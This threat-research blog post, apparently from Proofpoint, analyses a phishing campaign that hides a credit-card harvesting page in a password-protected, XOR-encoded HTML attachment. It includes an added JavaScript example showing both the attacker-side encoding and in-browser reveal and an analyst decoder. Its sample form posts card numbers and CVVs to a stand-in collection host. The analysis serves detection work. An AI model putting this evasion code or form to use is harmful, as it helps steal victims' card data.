Overview
Recently, Proofpoint researchers have observed a number of email campaigns with attached password-protected malicious documents. These documents are primarily used to distribute malware including Cerber ransomware and the Ursnif banking Trojan, with document passwords included in the body of the email. The use of password-protected documents makes them difficult to execute in automated sandbox environments, circumventing a variety of anti-malware products. At the same time, including the password in the email makes it easy for recipients to open the document while password protection adds a sense of legitimacy.
Last week, however, we observed a phishing campaign using this technique designed to harvest credit card account numbers and personal information from account holders.
Analysis
The email sample that we analyzed was personalized with the recipient's name and what appear to be the starting digits of their credit card account number. The starting digits of a card number are standardized per issuer, though, so this only adds to the apparent legitimacy of the carefully crafted emails without requiring actual knowledge of the recipient's card number. The emails also use stolen branding and social engineering to create a sense of urgency, encouraging the recipient to update security information for their "new chip card" (Figure 1).
Figure 1: Personalized phishing email with HTML attachment
The email includes an HTML attachment that is protected by a password included in the email. The HTML attachment is also XOR-encoded, so the phishing page cannot be inspected or rendered without the password, again making automated analysis more difficult. The encoded attachment is shown in Figure 2:
Figure 2: XOR-encoded HTML file attached to lure email (split for screen wrap)
While the password-protected Microsoft Word documents we normally see in malware campaigns make use of Word's built-in functionality to add passwords, this is an HTML attachment, so it instead uses JavaScript to implement the password protection. The script pah.js (Figure 3) XOR-decodes the encoded HTML when the user enters the password provided in the body of the email (Figure 4).
Figure 3: Comment on pah.js JavaScript file that accepts a password and decodes the attached HTML file
Figure 4: Password prompt generated when the recipient opens the attached HTML file
If the user enters the password correctly, they will be presented with a fairly typical credit card phishing template, complete with stolen branding (redacted - Figure 5):
Figure 5: HTML phishing template after successful decoding (split for screen wrap)
The form submits the entered card details to the attacker's server in the same manner as typical credential phishing, via HTTP POST.
Figure 6: Code snippet from HTML file featuring POST method for submitting phished information
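To make the mechanism in Figures 2 through 6 concrete, the following is an added example (not the campaign's pah.js and not Proofpoint code): a repeating-key XOR "password protection" routine of the kind the attachment relies on, the decode step an analyst can run offline under Node with the password taken from the lure email, and a small extractor that pulls the POST target out of the decoded form. The function names, the sample HTML form, the password "1234" and the URL example.invalid are all constructed for illustration; the real attachment's encoding details are not reproduced here.

```javascript
// Added example: repeating-key XOR "password protection" of an HTML attachment,
// the analyst-side decode, and extraction of the exfiltration target.
// All names, the sample form and the password below are constructed.

// Repeating-key XOR: the same routine encodes and decodes.
function xorWithPassword(bytes, password) {
  const key = new TextEncoder().encode(password);
  if (key.length === 0) throw new Error("empty password");
  const out = new Uint8Array(bytes.length);
  for (let i = 0; i < bytes.length; i++) {
    out[i] = bytes[i] ^ key[i % key.length];
  }
  return out;
}

function toHex(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join("");
}

function fromHex(hex) {
  if (hex.length % 2 !== 0) throw new Error("odd-length hex");
  const out = new Uint8Array(hex.length / 2);
  for (let i = 0; i < out.length; i++) {
    out[i] = parseInt(hex.slice(i * 2, i * 2 + 2), 16);
  }
  return out;
}

// Attacker side (illustrative): the encoded blob that gets embedded in the attachment.
function encodeAttachment(html, password) {
  return toHex(xorWithPassword(new TextEncoder().encode(html), password));
}

// Analyst side: decode with the password from the email body; no browser needed.
function decodeAttachment(encodedHex, password) {
  return new TextDecoder().decode(xorWithPassword(fromHex(encodedHex), password));
}

// Cheap check that the password was right: a wrong key yields bytes that
// almost never form an HTML document.
function looksLikeHtml(text) {
  return /<\s*(html|form|body)\b/i.test(text);
}

// Where the phished data goes: action URLs of every form submitted via POST.
function extractPostTargets(html) {
  const targets = [];
  const formRe = /<form\b([^>]*)>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const attrs = m[1];
    const methodMatch = attrs.match(/method\s*=\s*["']?(\w+)/i);
    const method = methodMatch ? methodMatch[1].toLowerCase() : "get";
    const actionMatch = attrs.match(/action\s*=\s*["']([^"']*)["']/i);
    const action = actionMatch ? actionMatch[1] : "";
    if (method === "post") targets.push(action);
  }
  return targets;
}

// Constructed sample: a minimal card-phishing form, "protected" with the
// password that the lure email would carry in its body.
const SAMPLE_PASSWORD = "1234";
const SAMPLE_HTML =
  '<html><body><form method="POST" action="http://example.invalid/collect.php">' +
  '<input name="cc"><input name="cvv"><input type="submit"></form></body></html>';
const SAMPLE_ENCODED = encodeAttachment(SAMPLE_HTML, SAMPLE_PASSWORD);

// What the attachment's script does in the victim's browser after the prompt
// (Figure 4): decode, then replace the page with the decoded template.
function revealInBrowser(encodedHex) {
  const pw = window.prompt("Enter the password from your email");
  const html = decodeAttachment(encodedHex, pw);
  if (!looksLikeHtml(html)) { window.alert("Wrong password"); return; }
  document.open(); document.write(html); document.close();
}

if (typeof window === "undefined") {
  // Running under Node (analyst use): decode and report the exfil target.
  const decoded = decodeAttachment(SAMPLE_ENCODED, SAMPLE_PASSWORD);
  console.log("decoded OK:", looksLikeHtml(decoded));
  console.log("POST targets:", extractPostTargets(decoded));
}
```

Because the key is simply the password the email hands the victim, nothing about the scheme is cryptographically protective; its only purpose is to keep the rendered form out of reach of scanners that never see the email body. An analyst who has both the email and the attachment can pair them and decode offline, and the decoded form's action attribute is the indicator worth blocking.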
Conclusion
Credential and credit card phishing are nearly as old as cybercrime itself. This hasn't stopped phishing actors from innovating and exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password-protected attachments to bypass anti-malware technologies and give recipients a false sense of security. The bottom line for end users is that the appearance of legitimacy, even including personalization and convincing branding, does not equal safety online.
Indicators of Compromise (IOCs)
IOC | IOC Type | Description
e5bbbcea49bf6ba0de0b7d614001be29 | MD5 | Email sample
d0357e7a96189f0f25099fc84a650fa9546184c5f9263ef06b449b7d02c4f692 | SHA256 | Email sample
3b01a61c484e7148df640b55f54240e3 | MD5 | HTML attachment
6ee9d70f02bf71df64a06324d2d5cd32875dc0ab0ef2c7a8abd566f8654a8432 | SHA256 | HTML attachment